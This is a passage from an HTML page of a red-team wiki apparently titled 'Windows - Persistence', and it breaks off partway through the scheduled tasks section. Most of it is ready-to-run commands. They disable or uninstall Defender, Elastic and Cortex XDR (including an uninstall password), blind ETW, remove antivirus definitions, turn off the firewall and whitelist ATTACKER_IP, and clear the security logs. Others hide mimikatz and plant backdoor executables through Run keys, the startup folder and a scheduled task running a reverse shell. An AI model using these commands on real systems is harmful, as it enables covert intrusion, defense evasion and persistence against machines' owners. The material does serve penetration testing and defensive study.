<a href="#servicesecuritydescriptor" class="md-nav__link">
<span class="md-ellipsis">
ServiceSecurityDescriptor
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#scheduled-tasks-elevated" class="md-nav__link">
<span class="md-ellipsis">
Scheduled Tasks Elevated
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-management-instrumentation-event-subscription" class="md-nav__link">
<span class="md-ellipsis">
Windows Management Instrumentation Event Subscription
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement
</span>
</a>
<nav class="md-nav" aria-label="Binary Replacement">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-xp" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows XP+
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#binary-replacement-on-windows-10" class="md-nav__link">
<span class="md-ellipsis">
Binary Replacement on Windows 10+
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#skeleton-key" class="md-nav__link">
<span class="md-ellipsis">
Skeleton Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#virtual-machines" class="md-nav__link">
<span class="md-ellipsis">
Virtual Machines
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#windows-subsystem-for-linux" class="md-nav__link">
<span class="md-ellipsis">
Windows Subsystem for Linux
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#domain" class="md-nav__link">
<span class="md-ellipsis">
Domain
</span>
</a>
<nav class="md-nav" aria-label="Domain">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#user-certificate" class="md-nav__link">
<span class="md-ellipsis">
User Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-certificate" class="md-nav__link">
<span class="md-ellipsis">
Golden Certificate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#golden-ticket" class="md-nav__link">
<span class="md-ellipsis">
Golden Ticket
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#laps-persistence" class="md-nav__link">
<span class="md-ellipsis">
LAPS Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/redteam/persistence/windows-persistence.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/InternalAllTheThings/raw/main/docs/redteam/persistence/windows-persistence.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="windows-persistence">Windows - Persistence</h1>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#tools">Tools</a></li>
<li><a href="#hide-your-binary">Hide Your Binary</a></li>
<li><a href="#disable-antivirus-and-security">Disable Antivirus and Security</a><ul>
<li><a href="#antivirus-removal">Antivirus Removal</a></li>
<li><a href="#disable-windows-defender">Disable Windows Defender</a></li>
<li><a href="#disable-windows-firewall">Disable Windows Firewall</a></li>
<li><a href="#clear-system-and-security-logs">Clear System and Security Logs</a></li>
</ul>
</li>
<li><a href="#simple-user">Simple User</a><ul>
<li><a href="#registry-hkcu">Registry HKCU</a></li>
<li><a href="#startup">Startup</a></li>
<li><a href="#scheduled-tasks-user">Scheduled Tasks User</a></li>
<li><a href="#bits-jobs">BITS Jobs</a></li>
</ul>
</li>
<li><a href="#serviceland">Serviceland</a><ul>
<li><a href="#iis">IIS</a></li>
<li><a href="#windows-service">Windows Service</a></li>
</ul>
</li>
<li><a href="#elevated">Elevated</a><ul>
<li><a href="#registry-hklm">Registry HKLM</a><ul>
<li><a href="#winlogon-helper-dll">Winlogon Helper DLL</a></li>
<li><a href="#globalflag">GlobalFlag</a></li>
</ul>
</li>
<li><a href="#startup-elevated">Startup Elevated</a></li>
<li><a href="#services-elevated">Services Elevated</a></li>
<li><a href="#servicesecuritydescriptor">Service Security Descriptor</a></li>
<li><a href="#scheduled-tasks-elevated">Scheduled Tasks Elevated</a></li>
<li><a href="#binary-replacement">Binary Replacement</a><ul>
<li><a href="#binary-replacement-on-windows-xp">Binary Replacement on Windows XP+</a></li>
<li><a href="#binary-replacement-on-windows-10">Binary Replacement on Windows 10+</a></li>
</ul>
</li>
<li><a href="#skeleton-key">Skeleton Key</a></li>
<li><a href="#virtual-machines">Virtual Machines</a></li>
<li><a href="#windows-subsystem-for-linux">Windows Subsystem for Linux</a></li>
</ul>
</li>
<li><a href="#domain">Domain</a><ul>
<li><a href="#golden-certificate">Golden Certificate</a></li>
<li><a href="#golden-ticket">Golden Ticket</a></li>
</ul>
</li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="tools">Tools</h2>
<ul>
<li><a href="https://github.com/fireeye/SharPersist">SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r</a></li>
</ul>
<h2 id="hide-your-binary">Hide Your Binary</h2>
<blockquote>
<p>Sets (+) or clears (-) the Hidden file attribute. If a file has this attribute set, you must clear it before you can change any other attributes of the file. Note that <code>+h</code> only hides the file from default Explorer and <code>dir</code> listings; <code>dir /a</code>, <code>Get-ChildItem -Force</code> and any endpoint agent still see it, so this is cosmetic rather than an evasion measure.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">PS</span><span class="p">&gt;</span> <span class="n">attrib</span> <span class="p">+</span><span class="nb">h </span><span class="n">mimikatz</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<h2 id="disable-antivirus-and-security">Disable Antivirus and Security</h2>
<h3 id="antivirus-removal">Antivirus Removal</h3>
<ul>
<li><a href="https://github.com/ayeskatalas/Sophos-Removal-Tool/">Sophos Removal Tool.ps1</a></li>
<li><a href="https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.html">Symantec CleanWipe</a></li>
<li><a href="https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html">Elastic EDR/Security</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="nb">cd </span><span class="s2">&quot;C:\Program Files\Elastic\Agent\&quot;</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\</span><span class="n">Program</span> <span class="n">Files</span><span class="p">\</span><span class="n">Elastic</span><span class="p">\</span><span class="n">Agent</span><span class="p">&gt;</span> <span class="p">.\</span><span class="n">elastic-agent</span><span class="p">.</span><span class="n">exe</span> <span class="n">uninstall</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">Elastic</span> <span class="n">Agent</span> <span class="n">will</span> <span class="n">be</span> <span class="n">uninstalled</span> <span class="n">from</span> <span class="n">your</span> <span class="n">system</span> <span class="n">at</span> <span class="n">C</span><span class="p">:\</span><span class="n">Program</span> <span class="n">Files</span><span class="p">\</span><span class="n">Elastic</span><span class="p">\</span><span class="n">Agent</span><span class="p">.</span> <span class="k">Do</span> <span class="n">you</span> <span class="n">want</span> <span class="n">to</span> <span class="k">continue</span><span class="p">?</span> <span class="p">[</span><span class="n">Y</span><span class="p">/</span><span class="n">n</span><span class="p">]:</span><span class="n">Y</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="n">Elastic</span> <span class="n">Agent</span> <span class="n">has</span> <span class="n">been</span> <span class="n">uninstalled</span><span class="p">.</span>
</code></pre></div></li>
<li><a href="https://mrd0x.com/cortex-xdr-analysis-and-bypass/">Cortex XDR</a>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="c"># Global uninstall password: Password1</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="n">Password</span> <span class="n">hash</span> <span class="n">is</span> <span class="n">located</span> <span class="k">in</span> <span class="n">C</span><span class="p">:\</span><span class="n">ProgramData</span><span class="p">\</span><span class="n">Cyvera</span><span class="p">\</span><span class="n">LocalSystem</span><span class="p">\</span><span class="n">Persistence</span><span class="p">\</span><span class="n">agent_settings</span><span class="p">.</span><span class="n">db</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="n">Look</span> <span class="k">for</span> <span class="n">PasswordHash</span><span class="p">,</span> <span class="n">PasswordSalt</span> <span class="n">or</span> <span class="n">password</span><span class="p">,</span> <span class="n">salt</span> <span class="n">strings</span><span class="p">.</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="c"># Disable Cortex: Change the DLL to a random value, then REBOOT</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="n">reg</span> <span class="n">add</span> <span class="n">HKEY_LOCAL_MACHINE</span><span class="p">\</span><span class="n">SYSTEM</span><span class="p">\</span><span class="n">CurrentControlSet</span><span class="p">\</span><span class="n">Services</span><span class="p">\</span><span class="n">CryptSvc</span><span class="p">\</span><span class="n">Parameters</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_EXPAND_SZ</span> <span class="p">/</span><span class="n">v</span> <span class="n">ServiceDll</span> <span class="p">/</span><span class="n">d</span> <span class="n">nothing</span><span class="p">.</span><span class="n">dll</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a>
<a id="__codelineno-2-8" name="__codelineno-2-8" href="#__codelineno-2-8"></a><span class="c"># Disables the agent on startup (requires reboot to work)</span>
<a id="__codelineno-2-9" name="__codelineno-2-9" href="#__codelineno-2-9"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">startup</span> <span class="n">disable</span>
<a id="__codelineno-2-10" name="__codelineno-2-10" href="#__codelineno-2-10"></a>
<a id="__codelineno-2-11" name="__codelineno-2-11" href="#__codelineno-2-11"></a><span class="c"># Disables protection on Cortex XDR files, processes, registry and services</span>
<a id="__codelineno-2-12" name="__codelineno-2-12" href="#__codelineno-2-12"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">protect</span> <span class="n">disable</span>
<a id="__codelineno-2-13" name="__codelineno-2-13" href="#__codelineno-2-13"></a>
<a id="__codelineno-2-14" name="__codelineno-2-14" href="#__codelineno-2-14"></a><span class="c"># Disables Cortex XDR (Even with tamper protection enabled)</span>
<a id="__codelineno-2-15" name="__codelineno-2-15" href="#__codelineno-2-15"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">runtime</span> <span class="n">disable</span>
<a id="__codelineno-2-16" name="__codelineno-2-16" href="#__codelineno-2-16"></a>
<a id="__codelineno-2-17" name="__codelineno-2-17" href="#__codelineno-2-17"></a><span class="c"># Disables event collection</span>
<a id="__codelineno-2-18" name="__codelineno-2-18" href="#__codelineno-2-18"></a><span class="n">cytool</span><span class="p">.</span><span class="n">exe</span> <span class="n">event_collection</span> <span class="n">disable</span>
</code></pre></div></li>
</ul>
<h3 id="disable-windows-defender">Disable Windows Defender</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="c"># Disable Defender</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="nb">sc </span><span class="n">config</span> <span class="n">WinDefend</span> <span class="n">start</span><span class="p">=</span> <span class="n">disabled</span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="nb">sc </span><span class="n">stop</span> <span class="n">WinDefend</span>
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a><span class="nb">Set-MpPreference</span> <span class="n">-DisableRealtimeMonitoring</span> <span class="nv">$true</span>
<a id="__codelineno-3-5" name="__codelineno-3-5" href="#__codelineno-3-5"></a>
<a id="__codelineno-3-6" name="__codelineno-3-6" href="#__codelineno-3-6"></a><span class="c">## Exclude a process / location</span>
<a id="__codelineno-3-7" name="__codelineno-3-7" href="#__codelineno-3-7"></a><span class="nb">Set-MpPreference</span> <span class="n">-ExclusionProcess</span> <span class="s2">&quot;word.exe&quot;</span><span class="p">,</span> <span class="s2">&quot;vmwp.exe&quot;</span>
<a id="__codelineno-3-8" name="__codelineno-3-8" href="#__codelineno-3-8"></a><span class="nb">Add-MpPreference</span> <span class="n">-ExclusionProcess</span> <span class="s1">&#39;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&#39;</span>
<a id="__codelineno-3-9" name="__codelineno-3-9" href="#__codelineno-3-9"></a><span class="nb">Add-MpPreference</span> <span class="n">-ExclusionPath</span> <span class="n">C</span><span class="p">:\</span><span class="n">Video</span><span class="p">,</span> <span class="n">C</span><span class="p">:\</span><span class="n">install</span>
<a id="__codelineno-3-10" name="__codelineno-3-10" href="#__codelineno-3-10"></a>
<a id="__codelineno-3-11" name="__codelineno-3-11" href="#__codelineno-3-11"></a><span class="c"># Disable scanning all downloaded files and attachments, disable AMSI (reactive)</span>
<a id="__codelineno-3-12" name="__codelineno-3-12" href="#__codelineno-3-12"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableRealtimeMonitoring</span> <span class="nv">$true</span><span class="p">;</span> <span class="nb">Get-MpComputerStatus</span>
<a id="__codelineno-3-13" name="__codelineno-3-13" href="#__codelineno-3-13"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableIOAVProtection</span> <span class="nv">$true</span>
<a id="__codelineno-3-14" name="__codelineno-3-14" href="#__codelineno-3-14"></a><span class="c"># Disable AMSI (set to 0 to enable)</span>
<a id="__codelineno-3-15" name="__codelineno-3-15" href="#__codelineno-3-15"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">Set-MpPreference</span> <span class="n">-DisableScriptScanning</span> <span class="n">1</span>
<a id="__codelineno-3-16" name="__codelineno-3-16" href="#__codelineno-3-16"></a>
<a id="__codelineno-3-17" name="__codelineno-3-17" href="#__codelineno-3-17"></a><span class="c"># Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions</span>
<a id="__codelineno-3-18" name="__codelineno-3-18" href="#__codelineno-3-18"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;Start&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;0&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-19" name="__codelineno-3-19" href="#__codelineno-3-19"></a>
<a id="__codelineno-3-20" name="__codelineno-3-20" href="#__codelineno-3-20"></a><span class="c"># Wipe currently stored definitions</span>
<a id="__codelineno-3-21" name="__codelineno-3-21" href="#__codelineno-3-21"></a><span class="c"># Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\&lt;antimalware platform version&gt;</span>
<a id="__codelineno-3-22" name="__codelineno-3-22" href="#__codelineno-3-22"></a><span class="n">MpCmdRun</span><span class="p">.</span><span class="n">exe</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-23" name="__codelineno-3-23" href="#__codelineno-3-23"></a>
<a id="__codelineno-3-24" name="__codelineno-3-24" href="#__codelineno-3-24"></a><span class="c"># Remove signatures (if Internet connection is present, they will be downloaded again):</span>
<a id="__codelineno-3-25" name="__codelineno-3-25" href="#__codelineno-3-25"></a><span class="nb">PS </span><span class="p">&gt;</span> <span class="p">&amp;</span> <span class="s2">&quot;C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe&quot;</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-26" name="__codelineno-3-26" href="#__codelineno-3-26"></a><span class="nb">PS </span><span class="p">&gt;</span> <span class="p">&amp;</span> <span class="s2">&quot;C:\Program Files\Windows Defender\MpCmdRun.exe&quot;</span> <span class="n">-RemoveDefinitions</span> <span class="n">-All</span>
<a id="__codelineno-3-27" name="__codelineno-3-27" href="#__codelineno-3-27"></a>
<a id="__codelineno-3-28" name="__codelineno-3-28" href="#__codelineno-3-28"></a><span class="c"># Disable Windows Defender Security Center</span>
<a id="__codelineno-3-29" name="__codelineno-3-29" href="#__codelineno-3-29"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\System\CurrentControlSet\Services\SecurityHealthService&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;Start&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;4&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-30" name="__codelineno-3-30" href="#__codelineno-3-30"></a>
<a id="__codelineno-3-31" name="__codelineno-3-31" href="#__codelineno-3-31"></a><span class="c"># Disable Real Time Protection</span>
<a id="__codelineno-3-32" name="__codelineno-3-32" href="#__codelineno-3-32"></a><span class="n">reg</span> <span class="n">delete</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-33" name="__codelineno-3-33" href="#__codelineno-3-33"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;DisableAntiSpyware&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;1&quot;</span> <span class="p">/</span><span class="n">f</span>
<a id="__codelineno-3-34" name="__codelineno-3-34" href="#__codelineno-3-34"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="s2">&quot;DisableAntiVirus&quot;</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_DWORD</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;1&quot;</span> <span class="p">/</span><span class="n">f</span>
</code></pre></div>
<h3 id="disable-windows-firewall">Disable Windows Firewall</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="n">Netsh</span> <span class="n">Advfirewall</span> <span class="n">show</span> <span class="n">allprofiles</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="n">NetSh</span> <span class="n">Advfirewall</span> <span class="nb">set </span><span class="n">allprofiles</span> <span class="n">state</span> <span class="n">off</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="c"># ip whitelisting</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="nb">New-NetFirewallRule</span> <span class="n">-Name</span> <span class="n">morph3inbound</span> <span class="n">-DisplayName</span> <span class="n">morph3inbound</span> <span class="n">-Enabled</span> <span class="n">True</span> <span class="n">-Direction</span> <span class="n">Inbound</span> <span class="n">-Protocol</span> <span class="n">ANY</span> <span class="n">-Action</span> <span class="n">Allow</span> <span class="n">-Profile</span> <span class="n">ANY</span> <span class="n">-RemoteAddress</span> <span class="n">ATTACKER_IP</span>
</code></pre></div>
<h3 id="clear-system-and-security-logs">Clear System and Security Logs</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="n">cmd</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">c</span> <span class="n">wevtutil</span><span class="p">.</span><span class="n">exe</span> <span class="n">cl</span> <span class="n">System</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="n">cmd</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">c</span> <span class="n">wevtutil</span><span class="p">.</span><span class="n">exe</span> <span class="n">cl</span> <span class="n">Security</span>
</code></pre></div>
<h2 id="simple-user">Simple User</h2>
<p>Set a file as hidden</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">attrib</span> <span class="p">+</span><span class="nb">h </span><span class="n">c</span><span class="p">:\</span><span class="n">autoexec</span><span class="p">.</span><span class="n">bat</span>
</code></pre></div>
<h3 id="registry-hkcu">Registry HKCU</h3>
<p>Create a REG_SZ value in the Run key under HKCU\Software\Microsoft\Windows\CurrentVersion (the full key path is shown in the commands below).</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">Value</span> <span class="n">name</span><span class="p">:</span> <span class="n">Backdoor</span>
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a><span class="n">Value</span> <span class="n">data</span><span class="p">:</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using the command line:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-3" name="__codelineno-8-3" href="#__codelineno-8-3"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
<a id="__codelineno-8-4" name="__codelineno-8-4" href="#__codelineno-8-4"></a><span class="n">reg</span> <span class="n">add</span> <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&quot;</span> <span class="p">/</span><span class="n">v</span> <span class="n">Evil</span> <span class="p">/</span><span class="n">t</span> <span class="n">REG_SZ</span> <span class="p">/</span><span class="n">d</span> <span class="s2">&quot;C:\Users\user\backdoor.exe&quot;</span>
</code></pre></div>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;hkcurun&quot;</span> <span class="n">-v</span> <span class="s2">&quot;Test Stuff&quot;</span> <span class="n">-m</span> <span class="n">add</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;hkcurun&quot;</span> <span class="n">-v</span> <span class="s2">&quot;Test Stuff&quot;</span> <span class="n">-m</span> <span class="n">add</span> <span class="n">-o</span> <span class="n">env</span>
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">reg</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="n">-k</span> <span class="s2">&quot;logonscript&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h3 id="startup">Startup</h3>
<p>Create a batch script in the user startup folder.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="nb">PS </span><span class="n">C</span><span class="p">:\&gt;</span> <span class="nb">gc </span><span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Roaming</span><span class="p">\</span><span class="n">Microsoft</span><span class="p">\</span><span class="n">Windows</span><span class="p">\</span><span class="nb">Start </span><span class="n">Menu</span><span class="p">\</span><span class="n">Programs</span><span class="p">\</span><span class="n">Startup</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">bat</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="nb">start </span><span class="p">/</span><span class="n">b</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">Rasta</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">backdoor</span><span class="p">.</span><span class="n">exe</span>
</code></pre></div>
<p>Using SharPersist</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">SharPersist</span> <span class="n">-t</span> <span class="n">startupfolder</span> <span class="n">-c</span> <span class="s2">&quot;C:\Windows\System32\cmd.exe&quot;</span> <span class="n">-a</span> <span class="s2">&quot;/c calc.exe&quot;</span> <span class="o">-f</span> <span class="s2">&quot;Some File&quot;</span> <span class="n">-m</span> <span class="n">add</span>
</code></pre></div>
<h3 id="scheduled-tasks-user">Scheduled Tasks User</h3>
<ul>
<li>Using native <strong>schtasks</strong> - Create a new task
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="c"># Create the scheduled tasks to run once at 00.00</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="nb">sc </span><span class="n">ONCE</span> <span class="p">/</span><span class="n">st</span> <span class="n">00</span><span class="p">:</span><span class="n">00</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;Device-Synchronize&quot;</span> <span class="p">/</span><span class="n">tr</span> <span class="n">C</span><span class="p">:\</span><span class="n">Temp</span><span class="p">\</span><span class="n">revshell</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="c"># Force run it now !</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">run</span> <span class="p">/</span><span class="n">tn</span> <span class="s2">&quot;Device-Synchronize&quot;</span>
</code></pre></div></li>
<li>
<p>Using native <strong>schtasks</strong> - Leverage the <code>schtasks /change</code> command to modify an existing scheduled task
